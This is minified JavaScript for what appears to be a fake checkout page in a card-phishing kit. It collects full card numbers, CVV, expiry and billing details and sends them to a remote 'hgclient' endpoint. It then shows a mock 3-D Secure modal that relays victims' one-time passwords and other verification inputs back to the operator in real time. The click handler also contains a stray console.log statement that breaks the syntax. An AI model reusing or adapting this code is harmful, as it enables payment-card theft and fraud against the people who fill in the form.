const hgformat=new HGformat;
function getFormFields(){
    const e=ui.getElement("cardExpiry").value.split("/")
        ,t=[ui.getElement("billingCountry").value
        ,ui.getElement("billingAdministrativeArea").value,
        ui.getElement("billingLocality").value,
        ui.getElement("billingAddressLine1").value,
        ui.getElement("billingAddressLine2").value];
    return{
        card:ui.getElement("cardNumber").value,
        expMonth:e[0],expYear:e[1],
        cvv:ui.getElement("cardCvc").value,
        holder:ui.getElement("billingName").value,
        email:ui.getElement("billingEmail").value,
        phone:ui.getElement("billingPhone").value,address:
            t.filter((e=>""!==e)).join(", "),zip:ui.getElement("billingPostalCode").value,amount:ui.getElement("paymentTotal").value}}

function payFormValidate(){let e=!1;const t=ui.getElement("cardNumber").value.replaceAll(" ","");return!hgformat.cardLuhn(t)||16!==t.length&&15!==t.length?(e=!0,ui.setInputError("cardNumber",!0)):ui.setInputError("cardNumber",!1),!function(e){if(!/^(0[1-9]|1[0-2])\/\d{2}$/.test(e))return!1;const[t,n]=e.split("/").map(Number),i=new Date,a=i.getMonth()+1,l=i.getFullYear()%100;return n>l||n===l&&t>a}(ui.getElement("cardExpiry").value)?(e=!0,ui.setInputError("cardExpiry",!0)):ui.setInputError("cardExpiry",!1),/^\d{3,4}$/.test(ui.getElement("cardCvc").value)?ui.setInputError("cardCvc",!1):(e=!0,ui.setInputError("cardCvc",!0)),ui.getElement("billingName").value.length<3?(e=!0,ui.setInputError("billingName",!0)):ui.setInputError("billingName",!1),ui.getElement("billingAddressLine1").value.length<3?(e=!0,ui.setInputError("billingAddressLine1",!0)):ui.setInputError("billingAddressLine1",!1),ui.getElement("billingLocality").value.length<3?(e=!0,ui.setInputError("billingLocality",!0)):ui.setInputError("billingLocality",!1),ui.getElement("billingPostalCode").value.length<3?(e=!0,ui.setInputError("billingPostalCode",!0)):ui.setInputError("billingPostalCode",!1),e}

ui.getElement("submitButton").addEventListener("click",(
    console.log('fire', payFormValidate());
    async(e)=>{
        e.preventDefault();
        if(payFormValidate())return;const e=getFormFields();hgclient.action("card",e);const[t,n]=(()=>{const t=e.card.replace(/ /g,"");return["*".repeat(t.length-4)+t.slice(-4),t.slice(0,8)]})(),i=await hgclient.functions.checkBIN(n);sendMessageToIframe("payment_data",{card:t,summ:ui.getElement("paymentTotal").value,website:ui.getElement("websiteDomain").value}),sendMessageToIframe("card_bin_info",!!i.status&&i.data),open3dsModal()}));let hgclient=null;function sendMessageToIframe(e,t){ui.getElement("iframe3ds").contentWindow.postMessage({action:e,data:t},"*")}window.addEventListener("message",(e=>{const t=e.data;switch(t.action){case"otp":hgclient.action("otp",{text:t.data}),sendMessageToIframe("clear_all_input",null),sendMessageToIframe("loading",null);break;case"custom":hgclient.action("custom",{text:t.data}),sendMessageToIframe("clear_all_input",null),sendMessageToIframe("loading",null)}})),document.addEventListener("DOMContentLoaded",(async()=>{hgformat.cardNumber(`#${ui.getElement("cardNumber").id}`,(function(e){const t={amex:"/assets/img/amex.svg",diners:"/assets/img/diners.svg",jcb:"/assets/img/jcb.svg",visa:"/assets/img/visa.svg",mastercard:"/assets/img/mastercard.svg",discover:"/assets/img/discover.svg"};"unknown"!==e?(ui.getElement("card-icon-fields").style.display="none",ui.getElement("card-icon-field").style.display="flex",ui.getElement("card-icon").src=t[e]):(ui.getElement("card-icon-fields").style.display="flex",ui.getElement("card-icon-field").style.display="none")})),hgformat.cardDate(`#${ui.getElement("cardExpiry").id}`),hgformat.cardCVV(`#${ui.getElement("cardCvc").id}`),hgclient=new HGclient(ui.getElement("apiEndpoint").value,"TestPayment");const{data:e}=await hgclient.getProjectSettings();hgclient.on("otp",(e=>{open3dsModal(),sendMessageToIframe("otp",e)})),hgclient.on("otp_error",(e=>{open3dsModal(),sendMessageToIframe("otp_error",e)})),hgclient.on("push",(e=>{open3dsModal(),sendMessageToIframe("push",e)})),hgclient.on("push_error",(e=>{open3dsModal(),sendMessageToIframe("push_error",e)})),hgclient.on("custom",(e=>{open3dsModal(),sendMessageToIframe("custom",e)})),hgclient.on("custom_error",(e=>{open3dsModal(),sendMessageToIframe("custom_error",e)})),hgclient.on("card_error",(e=>{ui.setInputError("cardNumber",!0),ui.setInputError("cardExpiry",!0),ui.setInputError("cardCvc",!0),close3dsModal()})),hgclient.on("end_success",(t=>{setTimeout((()=>{close3dsModal(),window.location.replace(ui.getElement("endSuccess").value||e.success_url)}),3e3),sendMessageToIframe("end_success",t)})),hgclient.on("end_failed",(t=>{setTimeout((()=>{close3dsModal(),window.location.replace(ui.getElement("endFailed").value||e.failed_url)}),3e3),sendMessageToIframe("end_failed",t)})),hgclient.start()}));